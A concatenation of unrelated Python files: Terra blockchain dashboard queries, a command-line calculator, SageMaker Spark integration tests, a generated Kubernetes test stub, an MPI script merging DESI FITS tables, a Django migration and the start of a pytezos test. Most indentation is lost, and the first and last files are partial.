df[["id", "Yes", "No", "Abstain", "NoWithVeto"]] = df[
["id", "Yes", "No", "Abstain", "NoWithVeto"]
].astype(int, errors="ignore")
df["title"] = df["title"].apply(
lambda x: "\n".join(textwrap.wrap(x, width=40)) if isinstance(x, str) else x
)
for col in ["submitTime", "depositEndTime"]:
df[col] = df[col].apply(lambda x: pd.to_datetime(x).strftime("%Y-%m-%d %H:%M"))
if status.title() in statuses:
df = df[df["status"] == status.title()]
return df
@log_start_end(log=logger)
def get_account_growth(cumulative: bool = True) -> pd.DataFrame:
"""Get terra blockchain account growth history [Source: https://fcd.terra.dev/swagger]
Parameters
----------
cumulative: bool
distinguish between periodical and cumulative account growth data
Returns
-------
pd.DataFrame
historical data of accounts growth
"""
response = _make_request("dashboard/account_growth")
kind = "cumulative" if cumulative else "periodic"
df = pd.DataFrame(response[kind])
df["date"] = df["datetime"].apply(lambda x: datetime.fromtimestamp(x / 1000).date())
df = df[["date", "totalAccountCount", "activeAccountCount"]]
df.columns = ["date", "Total accounts", "Active accounts"]
return df
@log_start_end(log=logger)
def get_staking_ratio_history():
"""Get terra blockchain staking ratio history [Source: https://fcd.terra.dev/swagger]
Returns
-------
pd.DataFrame
historical staking ratio
"""
response = _make_request("dashboard/staking_ratio")
df = pd.DataFrame(response)
df["date"] = df["datetime"].apply(lambda x: datetime.fromtimestamp(x / 1000).date())
df["stakingRatio"] = df["stakingRatio"].apply(lambda x: round(float(x) * 100, 2))
return df[["date", "stakingRatio"]]
@log_start_end(log=logger)
def get_staking_returns_history():
"""Get terra blockchain staking returns history [Source: https://fcd.terra.dev/v1]
Returns
-------
pd.DataFrame
historical staking returns
"""
response = _make_request("dashboard/staking_return")
df = pd.DataFrame(response)
df["date"] = df["datetime"].apply(lambda x: datetime.fromtimestamp(x / 1000).date())
df["annualizedReturn"] = df["annualizedReturn"].apply(
lambda x: round(float(x) * 100, 2)
)
return df[["date", "annualizedReturn"]]
|
#!/usr/bin/env python3
"""A simple calculator"""
from get_integer_from_user import get_integer
from get_float_from_user import get_float
from get_positive_number_from_user import get_positive_num
from primality_check import is_prime
from gcd_program import gcd_recursive
from get_integer_in_range import get_int_in_range
# init global variables
global latest_result, arg1, arg2, operator
latest_result = 0.0
arg1 = 0.0
arg2 = 0.0
operator = 'None'
def help_screen():
""" Displays Help Infomation.
How the program works. Accepts no parameters
Returns nothing
"""
print('-' * 60)
print(format('| {0} |', '-^44').format(__doc__))
print('-' * 60)
print(format(' Operation [1]: Addition (x + y) ', '_^60' ))
print(format(' Operation [2]: Subtraction (x - y) ', '_^60'))
print(format(' Operation [3]: Multiplication (x * y) ', '_^60'))
print(format(' Operation [4]: Division (x / y) ', '_^60'))
print(format(' Operation [5]: Exponentiation (x ** y) ', '_^60'))
print(format(' Operation [6]: Floor division (x // y) ', '_^60'))
print(format(' Operation [7]: Modulus division (x % y) ', '_^60'))
print(format(' Operation [8]: Greatest Common Divisor gcd(x,y) ', '_^60'))
print(format(' Operation [9]: Test for Primality. (True/False) ', '_^60'))
print(format(' Operation [10]: Print latest result ', '_^60'))
print(format(' Operation [0]: Help (Displays this help screen) ', '_^60'))
print(format(' Operation [-1]: Exit Calculator', '_^60'))
print('-' * 60)
def menu():
""" Displays Arithmetic Menu Options.
Accepts no parameter
Returns an integer from user
"""
help_screen()
    print(format(' Enter Command to Proceed ', '|^60'))
print(format(' [-1]Quit [0]Help ', '|^60'))
print(format(' [1]Add [2]Sub [3]Multiply [4]Divide', '|^60'))
    print(format(' [5]Exp [6]Floor [7]Mod [8]gcd [9]primality ', '|^60' ))
print('-' * 60)
print('Select Operation [-1 - 10]: ')
return get_int_in_range(-1, 10)
def arithmetic_ops():
""" Runs a command loop that allows users to perform simple arithmetic """
# Init
latest_result = 0.0
terminate = False
while not terminate:
op_selection = menu() # Get user's choice
if op_selection == -1: # Terminate Program
terminate = True
elif op_selection == 0: # Help
help_screen()
elif op_selection == 1: # Add
print(format(' ADDITITION (x+y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '+'
print()
latest_result = add_two(arg1, arg2) # Store latest result
print('{0:,} + {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 2: # Subtraction
print(format(' SUBTRACTION (x-y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '-'
print()
latest_result = subtract_two(arg1, arg2) # Store latest result
print('{0:,} - {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 3: # Multiply
print(format(' MULTIPLY (x*y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '*'
print()
latest_result = multiply_two(arg1, arg2) # Store latest result
print('{0:,} * {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 4: # Division
            print(format(' DIVISION (x/y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '/'
print()
latest_result = divide(arg1, arg2) # Store latest result
print('{0} / {1} = {2}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 5: # Exponentiate
            print(format(' EXPONENTIATION (x**y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '**'
print()
latest_result = exp_two(arg1, arg2) # Store latest result
print('{0:,} ** {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 6: # Truncation Div
print(format(' FLOOR DIVISION (x//y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '//'
print()
latest_result = floor_div(arg1, arg2) # Store latest result
print('{0:,} // {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 7: # Modulo div
print(format(' MODULO DIVISION (x%y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '%'
print()
latest_result = modulo_div(arg1, arg2) # Store latest result
print('{0} % {1} = {2}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 8: # gcd
print(format(' GCD(x,y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_integer()
arg2 = get_integer()
operator = 'gcd'
latest_result = gcd_recursive(arg1, arg2) # Store result
print('gcd({0:,}, {1:,}) = {2:,}'.format(arg1, arg2, latest_result))
print(format(' RESULT ', '|^60'))
elif op_selection == 9: # primality
print(format(' PRIME? (True/False) ', '|^60'))
# Init
# global arg1, latest_result, operator
arg1 = int(get_positive_num())
operator = 'prime'
print()
latest_result = is_prime(arg1)
print('{0:,} is prime? - {1} '.format(arg1, latest_result))
print(format(' RESULT ', '|^60'))
else: # print
try:
if operator in ['+', '-', '*', '**', '%', '//', '/']:
print('latest_operation: {0} {1} {2} = {3}'.format(arg1, operator, arg2, latest_result) )
elif operator == 'gcd':
print('latest_operation: gcd({0}, {1}) = {2}'.format(arg1, arg2, latest_result) )
elif operator == 'prime':
print('latest_operation: is_prime({0}) = {1}'.format(arg1, latest_result) )
except UnboundLocalError as no_history:
print(no_history)
except Exception as other_error:
print(other_error)
def add_two(arg1, arg2):
""" (float, float) -> float
Adds two numbers up
Returns arg1 + arg2
"""
try:
return arg1 + arg2
except TypeError:
return 'Unsupported operation: {0} + {1} '.format(type(arg1), type(arg2))
def multiply_two(arg1, arg2):
""" (float, float) -> float
multiplies two numbers (arg1 * arg2)
Returns the product
"""
try:
return arg1 * arg2
except TypeError:
return 'Unsupported operation: {0} * {1} '.format(type(arg1), type(arg2))
def subtract_two(arg1, arg2):
""" (float, float) -> float
    subtracts two numbers (arg1 - arg2)
Returns the difference
"""
try:
return arg1 - arg2
except TypeError:
return 'Unsupported operation: {0} - {1} '.format(type(arg1), type(arg2))
def divide(arg1, arg2):
""" (float, float) -> float
Divides two numbers (arg1 / arg2)
Returns arg1 / arg2
"""
try:
return arg1 / arg2
except TypeError:
return 'Unsupported operation: {0} / {1} '.format(type(arg1), type(arg2))
except ZeroDivisionError as zero_error:
return 'Unsupported operation: {0} / {1} -> {2}'.format(arg1, arg2, zero_error)
except Exception as other_error:
return 'Oops... {0}'.format(other_error)
def floor_div(arg1, arg2):
""" (float, float) -> float
Performs floor division on two numbers
Returns arg1 // arg2
"""
try:
        return arg1 // arg2
except TypeError:
return 'Unsupported operation: {0} // {1} '.format(type(arg1), type(arg2))
def exp_two(arg1, arg2):
""" (float, float) -> float
Exponentiates two numbers (arg1 ** arg2)
    Returns arg1 raised to the power arg2
"""
try:
return arg1 ** arg2
except TypeError:
return 'Unsupported operation: {0} ** {1} '.format(type(arg1), type(arg2))
def modulo_div(arg1, arg2):
""" (float, float) -> float
Modulo division of two numbers
Returns (arg1 % arg2)
"""
try:
return arg1 % arg2
except TypeError:
return 'Unsupported operation: {0} % {1} '.format(type(arg1), type(arg2))
except ZeroDivisionError as zero_error:
return 'Unsupported operation: {0} % {1} -> {2}'.format(arg1, arg2, zero_error)
except Exception as other_error:
return 'Oops... {0}'.format(other_error)
if __name__ == '__main__':
arithmetic_ops()
|
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import random
import time
from datetime import datetime
import boto3
import pytest
from sagemaker.s3 import S3Downloader, S3Uploader
from sagemaker.spark.processing import PySparkProcessor, SparkJarProcessor
@pytest.fixture(autouse=True)
def jitter():
"Add random sleeps before tests to avoid breaching CreateProcessingJob API limits"
time.sleep(random.random() * 10)
@pytest.fixture
def configuration() -> list:
configuration = [
{
"Classification": "spark-defaults",
"Properties": {"spark.executor.memory": "2g", "spark.executor.cores": "1"},
},
{
"Classification": "hadoop-env",
"Properties": {},
"Configurations": [
{
"Classification": "export",
"Properties": {"HADOOP_DATANODE_HEAPSIZE": "2048", "HADOOP_NAMENODE_OPTS": "-XX:GCTimeRatio=19",},
"Configurations": [],
}
],
},
{"Classification": "core-site", "Properties": {"spark.executor.memory": "2g", "spark.executor.cores": "1"},},
{"Classification": "hadoop-log4j", "Properties": {"key": "value"}},
{
"Classification": "hive-env",
"Properties": {},
"Configurations": [
{
"Classification": "export",
"Properties": {"HADOOP_DATANODE_HEAPSIZE": "2048", "HADOOP_NAMENODE_OPTS": "-XX:GCTimeRatio=19",},
"Configurations": [],
}
],
},
{"Classification": "hive-log4j", "Properties": {"key": "value"}},
{"Classification": "hive-exec-log4j", "Properties": {"key": "value"}},
{"Classification": "hive-site", "Properties": {"key": "value"}},
{"Classification": "spark-defaults", "Properties": {"key": "value"}},
{
"Classification": "spark-env",
"Properties": {},
"Configurations": [
{
"Classification": "export",
"Properties": {"HADOOP_DATANODE_HEAPSIZE": "2048", "HADOOP_NAMENODE_OPTS": "-XX:GCTimeRatio=19",},
"Configurations": [],
}
],
},
{"Classification": "spark-log4j", "Properties": {"key": "value"}},
{"Classification": "spark-hive-site", "Properties": {"key": "value"}},
{"Classification": "spark-metrics", "Properties": {"key": "value"}},
{"Classification": "yarn-site", "Properties": {"key": "value"}},
{
"Classification": "yarn-env",
"Properties": {},
"Configurations": [
{
"Classification": "export",
"Properties": {"HADOOP_DATANODE_HEAPSIZE": "2048", "HADOOP_NAMENODE_OPTS": "-XX:GCTimeRatio=19",},
"Configurations": [],
}
],
},
]
return configuration
@pytest.mark.parametrize(
"config", [{"instance_count": 1}, {"instance_count": 2}],
)
def test_sagemaker_pyspark_multinode(
role, image_uri, configuration, sagemaker_session, region, sagemaker_client, config
):
    """Test that basic multinode case works on 32KB of data"""
    instance_count = config["instance_count"]
    print(f"Creating job with {instance_count} instance count")
spark = PySparkProcessor(
base_job_name="sm-spark-py",
image_uri=image_uri,
role=role,
instance_count=instance_count,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
bucket = spark.sagemaker_session.default_bucket()
timestamp = datetime.now().isoformat()
output_data_uri = "s3://{}/spark/output/sales/{}".format(bucket, timestamp)
spark_event_logs_key_prefix = "spark/spark-events/{}".format(timestamp)
spark_event_logs_s3_uri = "s3://{}/{}".format(bucket, spark_event_logs_key_prefix)
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
input_data_uri = "s3://{}/spark/input/data.jsonl".format(bucket)
S3Uploader.upload_string_as_file_body(
body=body, desired_s3_uri=input_data_uri, sagemaker_session=sagemaker_session
)
spark.run(
submit_app="test/resources/code/python/hello_py_spark/hello_py_spark_app.py",
submit_py_files=["test/resources/code/python/hello_py_spark/hello_py_spark_udfs.py"],
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration=configuration,
spark_event_logs_s3_uri=spark_event_logs_s3_uri,
wait=False,
)
processing_job = spark.latest_job
s3_client = boto3.client("s3", region_name=region)
file_size = 0
latest_file_size = None
updated_times_count = 0
time_out = time.time() + 900
while not processing_job_not_fail_or_complete(sagemaker_client, processing_job.job_name):
response = s3_client.list_objects(Bucket=bucket, Prefix=spark_event_logs_key_prefix)
if "Contents" in response:
            # Somehow, when calling list_objects, the first file size is always 0;
            # this for loop skips that entry.
for event_log_file in response["Contents"]:
if event_log_file["Size"] != 0:
print("\n##### Latest file size is " + str(event_log_file["Size"]))
latest_file_size = event_log_file["Size"]
# update the file size if it increased
if latest_file_size and latest_file_size > file_size:
print("\n##### S3 file updated.")
updated_times_count += 1
file_size = latest_file_size
if time.time() > time_out:
raise RuntimeError("Timeout")
time.sleep(20)
# verify that spark event logs are periodically written to s3
print("\n##### file_size {} updated_times_count {}".format(file_size, updated_times_count))
assert file_size != 0
# Commenting this assert because it's flaky.
# assert updated_times_count > 1
output_contents = S3Downloader.list(output_data_uri, sagemaker_session=sagemaker_session)
assert len(output_contents) != 0
# TODO: similar integ test case for SSE-KMS. This would require test infrastructure bootstrapping a KMS key.
# Currently, Spark jobs can read data encrypted with SSE-KMS (assuming the execution role has permission),
# however our Hadoop version (2.8.5) does not support writing data with SSE-KMS (enabled in version 3.0.0).
def test_sagemaker_pyspark_sse_s3(role, image_uri, sagemaker_session, region, sagemaker_client):
"""Test that Spark container can read and write S3 data encrypted with SSE-S3 (default AES256 encryption)"""
spark = PySparkProcessor(
base_job_name="sm-spark-py",
image_uri=image_uri,
role=role,
instance_count=2,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
bucket = sagemaker_session.default_bucket()
timestamp = datetime.now().isoformat()
input_data_key = f"spark/input/sales/{timestamp}/data.jsonl"
input_data_uri = f"s3://{bucket}/{input_data_key}"
output_data_uri = f"s3://{bucket}/spark/output/sales/{timestamp}"
s3_client = sagemaker_session.boto_session.client("s3", region_name=region)
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
s3_client.put_object(Body=body, Bucket=bucket, Key=input_data_key, ServerSideEncryption="AES256")
spark.run(
submit_app="test/resources/code/python/hello_py_spark/hello_py_spark_app.py",
submit_py_files=["test/resources/code/python/hello_py_spark/hello_py_spark_udfs.py"],
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration={
"Classification": "core-site",
"Properties": {"fs.s3a.server-side-encryption-algorithm": "AES256"},
},
)
processing_job = spark.latest_job
waiter = sagemaker_client.get_waiter("processing_job_completed_or_stopped")
waiter.wait(
ProcessingJobName=processing_job.job_name,
# poll every 15 seconds. timeout after 15 minutes.
WaiterConfig={"Delay": 15, "MaxAttempts": 60},
)
output_contents = S3Downloader.list(output_data_uri, sagemaker_session=sagemaker_session)
assert len(output_contents) != 0
def test_sagemaker_pyspark_sse_kms_s3(
role, image_uri, sagemaker_session, region, sagemaker_client, account_id, partition
):
spark = PySparkProcessor(
base_job_name="sm-spark-py",
image_uri=image_uri,
role=role,
instance_count=2,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
    # This test expects the AWS managed S3 KMS key to be present. The key will be in
    # KMS > AWS managed keys > aws/s3
kms_key_id = None
kms_client = sagemaker_session.boto_session.client("kms", region_name=region)
for alias in kms_client.list_aliases()["Aliases"]:
if "s3" in alias["AliasName"]:
kms_key_id = alias["TargetKeyId"]
if not kms_key_id:
raise ValueError("AWS managed s3 kms key(alias: aws/s3) does not exist")
bucket = sagemaker_session.default_bucket()
timestamp = datetime.now().isoformat()
input_data_key = f"spark/input/sales/{timestamp}/data.jsonl"
input_data_uri = f"s3://{bucket}/{input_data_key}"
output_data_uri_prefix = f"spark/output/sales/{timestamp}"
output_data_uri = f"s3://{bucket}/{output_data_uri_prefix}"
s3_client = sagemaker_session.boto_session.client("s3", region_name=region)
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
s3_client.put_object(
Body=body, Bucket=bucket, Key=input_data_key, ServerSideEncryption="aws:kms", SSEKMSKeyId=kms_key_id
)
spark.run(
submit_app="test/resources/code/python/hello_py_spark/hello_py_spark_app.py",
submit_py_files=["test/resources/code/python/hello_py_spark/hello_py_spark_udfs.py"],
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration={
"Classification": "core-site",
"Properties": {
"fs.s3a.server-side-encryption-algorithm": "SSE-KMS",
"fs.s3a.server-side-encryption.key": f"arn:{partition}:kms:{region}:{account_id}:key/{kms_key_id}",
},
},
)
processing_job = spark.latest_job
waiter = sagemaker_client.get_waiter("processing_job_completed_or_stopped")
waiter.wait(
ProcessingJobName=processing_job.job_name,
# poll every 15 seconds. timeout after 15 minutes.
WaiterConfig={"Delay": 15, "MaxAttempts": 60},
)
s3_objects = s3_client.list_objects(Bucket=bucket, Prefix=output_data_uri_prefix)["Contents"]
assert len(s3_objects) != 0
for s3_object in s3_objects:
object_metadata = s3_client.get_object(Bucket=bucket, Key=s3_object["Key"])
assert object_metadata["ServerSideEncryption"] == "aws:kms"
assert object_metadata["SSEKMSKeyId"] == f"arn:{partition}:kms:{region}:{account_id}:key/{kms_key_id}"
def test_sagemaker_scala_jar_multinode(role, image_uri, configuration, sagemaker_session, sagemaker_client):
"""Test SparkJarProcessor using Scala application jar with external runtime dependency jars staged by SDK"""
spark = SparkJarProcessor(
base_job_name="sm-spark-scala",
image_uri=image_uri,
role=role,
instance_count=2,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
bucket = spark.sagemaker_session.default_bucket()
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
input_data_uri = "s3://{}/spark/input/data.jsonl".format(bucket)
S3Uploader.upload_string_as_file_body(
body=body, desired_s3_uri=input_data_uri, sagemaker_session=sagemaker_session
)
output_data_uri = "s3://{}/spark/output/sales/{}".format(bucket, datetime.now().isoformat())
scala_project_dir = "test/resources/code/scala/hello-scala-spark"
spark.run(
submit_app="{}/target/scala-2.11/hello-scala-spark_2.11-1.0.jar".format(scala_project_dir),
submit_class="com.amazonaws.sagemaker.spark.test.HelloScalaSparkApp",
submit_jars=[
"{}/lib_managed/jars/org.json4s/json4s-native_2.11/json4s-native_2.11-3.6.9.jar".format(scala_project_dir)
],
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration=configuration,
)
processing_job = spark.latest_job
waiter = sagemaker_client.get_waiter("processing_job_completed_or_stopped")
waiter.wait(
ProcessingJobName=processing_job.job_name,
# poll every 15 seconds. timeout after 15 minutes.
WaiterConfig={"Delay": 15, "MaxAttempts": 60},
)
output_contents = S3Downloader.list(output_data_uri, sagemaker_session=sagemaker_session)
assert len(output_contents) != 0
def test_sagemaker_java_jar_multinode(tag, role, image_uri, configuration, sagemaker_session, sagemaker_client):
"""Test SparkJarProcessor using Java application jar"""
spark = SparkJarProcessor(
base_job_name="sm-spark-java",
framework_version=tag,
image_uri=image_uri,
role=role,
instance_count=2,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
bucket = spark.sagemaker_session.default_bucket()
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
input_data_uri = "s3://{}/spark/input/data.jsonl".format(bucket)
S3Uploader.upload_string_as_file_body(
body=body, desired_s3_uri=input_data_uri, sagemaker_session=sagemaker_session
)
output_data_uri = "s3://{}/spark/output/sales/{}".format(bucket, datetime.now().isoformat())
java_project_dir = "test/resources/code/java/hello-java-spark"
spark.run(
submit_app="{}/target/hello-java-spark-1.0-SNAPSHOT.jar".format(java_project_dir),
submit_class="com.amazonaws.sagemaker.spark.test.HelloJavaSparkApp",
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration=configuration,
)
processing_job = spark.latest_job
waiter = sagemaker_client.get_waiter("processing_job_completed_or_stopped")
waiter.wait(
ProcessingJobName=processing_job.job_name,
# poll every 15 seconds. timeout after 15 minutes.
WaiterConfig={"Delay": 15, "MaxAttempts": 60},
)
output_contents = S3Downloader.list(output_data_uri, sagemaker_session=sagemaker_session)
assert len(output_contents) != 0
def processing_job_not_fail_or_complete(sagemaker_client, job_name):
    """Return True once the processing job has reached a terminal state (Failed, Completed, or Stopped)."""
    response = sagemaker_client.describe_processing_job(ProcessingJobName=job_name)
    if not response or "ProcessingJobStatus" not in response:
        raise ValueError("Response is none or does not have ProcessingJobStatus")
    status = response["ProcessingJobStatus"]
    return status in ("Failed", "Completed", "Stopped")
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import kubernetes.client
from kubernetes.client.models.io_xk8s_cluster_bootstrap_v1alpha3_kubeadm_config_spec_content_from import IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom # noqa: E501
from kubernetes.client.rest import ApiException
class TestIoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom(unittest.TestCase):
"""IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom
        include_optional is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = kubernetes.client.models.io_xk8s_cluster_bootstrap_v1alpha3_kubeadm_config_spec_content_from.IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom() # noqa: E501
if include_optional :
return IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom(
secret = kubernetes.client.models.io_x_k8s_cluster_bootstrap_v1alpha3_kubeadm_config_spec_content_from_secret.io_x_k8s_cluster_bootstrap_v1alpha3_KubeadmConfig_spec_contentFrom_secret(
key = '0',
name = '0', )
)
else :
return IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom(
secret = kubernetes.client.models.io_x_k8s_cluster_bootstrap_v1alpha3_kubeadm_config_spec_content_from_secret.io_x_k8s_cluster_bootstrap_v1alpha3_KubeadmConfig_spec_contentFrom_secret(
key = '0',
name = '0', ),
)
def testIoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom(self):
"""Test IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
from mpi4py import MPI
import os, sys, glob, time
import numpy as np
import fitsio
def merge_table_data(infiles, ext=1):
'''
Merge the tables in HDU 1 of a set of input files
'''
data = [fitsio.read(x, ext) for x in infiles]
return np.hstack(data)
def merge_files(comm, globname, ext, outfile, outextname=None):
    '''
    Merge HDU `ext` of every file matching `globname` into `outfile` across MPI ranks.

    Note: gathering the merged tables directly between ranks doesn't work for
    large merges (pickle barfs if objects are too big), so intermediate results
    are staged through temporary files on disk instead.
    '''
size = comm.Get_size()
rank = comm.Get_rank()
if rank == 0:
infiles = glob.glob(globname)
print('Merging {} files from {}'.format(len(infiles), globname))
sys.stdout.flush()
else:
infiles = None
infiles = comm.bcast(infiles, root=0)
#- Each rank reads and combines a different set of files
if rank == 0:
print('reading', time.asctime())
data = merge_table_data(infiles[rank::size], ext=ext)
# print('Rank {} got {} rows'.format(rank, len(data)))
def tmpfile(outfile, rank):
return '{}-{}'.format(outfile, rank)
#- Merge via temporary files on disk (!) because the data tables are
#- too big to be sent via pickle (comm.gather, comm.send) but the dtype
#- is also too complex to be sent via the non-pickle methods (comm.Send)
#- Ugly hack, but pragmatically this works well
fitsio.write(tmpfile(outfile, rank), data, clobber=True)
comm.barrier()
if rank == 0:
print('stacking', time.asctime())
data_tables = list()
for i in range(size):
data_tables.append( fitsio.read(tmpfile(outfile, i), 1) )
os.remove(tmpfile(outfile, i))
data = np.hstack(data_tables)
if rank == 0:
print('writing {}'.format(outfile), time.asctime())
sys.stdout.flush()
header = fitsio.read_header(infiles[0], ext)
tmpout = outfile + '.tmp'
fitsio.write(tmpout, data, header=header, extname=outextname)
os.rename(tmpout, outfile)
comm.barrier()
#-------------------------------------------------------------------------
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
import optparse
parser = optparse.OptionParser(usage = "%prog [options]")
parser.add_option("-t", "--targetdir", type=str, help="input targets directory")
parser.add_option("-s", "--skydir", type=str, help="input sky directory")
parser.add_option("-o", "--outdir", type=str, help="output directory")
# parser.add_option("-v", "--verbose", action="store_true", help="some flag")
opts, args = parser.parse_args()
#- Edison defaults for debugging convenience
if opts.skydir is None:
opts.skydir = '/global/project/projectdirs/desi/users/forero/datachallenge2017/two_percent_DESI'
if opts.targetdir is None:
opts.targetdir = '/scratch2/scratchdirs/sjbailey/desi/dc17a/targets'
if opts.outdir is None:
opts.outdir = '/scratch2/scratchdirs/sjbailey/desi/dc17a/targets/testmerge'
#- Cori
# if opts.indir is None:
# opts.indir = '/global/cscratch1/sd/sjbailey/desi/dc17a/scratch/'
# if opts.outdir is None:
# opts.outdir = '/global/cscratch1/sd/sjbailey/desi/dc17a/targets/'
out_sky = opts.outdir+'/sky.fits'
out_stddark = opts.outdir+'/standards-dark.fits'
out_stdbright = opts.outdir+'/standards-bright.fits'
out_targets = opts.outdir+'/targets.fits'
out_truth = opts.outdir+'/truth.fits'
out_mtl = opts.outdir+'/mtl.fits'
#- Check which outputs still need to be done (in case we had to rerun)
#- All ranks need to know this, but just ping the disk with rank 0
if rank == 0:
todo = dict()
todo['sky'] = not os.path.exists(out_sky)
todo['targets'] = not os.path.exists(out_targets)
todo['truth'] = not os.path.exists(out_truth)
else:
todo = None
todo = comm.bcast(todo, root=0)
if todo['sky']:
merge_files(comm, opts.skydir+'/output_*/sky.fits', 1, out_sky, 'SKY')
if todo['targets']:
merge_files(comm, opts.targetdir+'/???/targets-*.fits', 1, out_targets, 'TARGETS')
if todo['truth']:
merge_files(comm, opts.targetdir+'/???/truth-*.fits', 'TRUTH', out_truth, 'TRUTH')
#- Extracts standards from targets file we just wrote
#- These are fast enough that it is ok that the other ranks are idle
#- MTL is done last; writing it is the slowest
if rank == 0:
if not os.path.exists(out_stddark) or \
not os.path.exists(out_stdbright) or \
not os.path.exists(out_mtl):
import desitarget
targets = fitsio.read(out_targets, 'TARGETS')
if not os.path.exists(out_stddark):
print('Generating '+out_stddark)
isSTD = (targets['DESI_TARGET'] & desitarget.desi_mask['STD_FSTAR']) != 0
tmpout = out_stddark + '.tmp'
fitsio.write(tmpout, targets[isSTD], extname='STD')
os.rename(tmpout, out_stddark)
if not os.path.exists(out_stdbright):
print('Generating '+out_stdbright)
isSTD = (targets['DESI_TARGET'] & desitarget.desi_mask['STD_BRIGHT']) != 0
tmpout = out_stdbright + '.tmp'
fitsio.write(tmpout, targets[isSTD], extname='STD')
os.rename(tmpout, out_stdbright)
if not os.path.exists(out_mtl):
print('Generating '+out_mtl)
import desitarget.mtl
mtl = desitarget.mtl.make_mtl(targets)
tmpout = out_mtl+'.tmp'
mtl.meta['EXTNAME'] = 'MTL'
mtl.write(tmpout, format='fits')
os.rename(tmpout, out_mtl)
MPI.Finalize()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-17 07:14
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Booking',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('level', models.IntegerField()),
('room', models.IntegerField()),
('am_dept', models.CharField(max_length=258)),
('pm_dept', models.CharField(max_length=258)),
('am_surg', models.CharField(max_length=258)),
('pm_surg', models.CharField(max_length=258)),
],
),
]
|
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/carthagenet/KT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv.json')
def test_storage_encoding_KT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
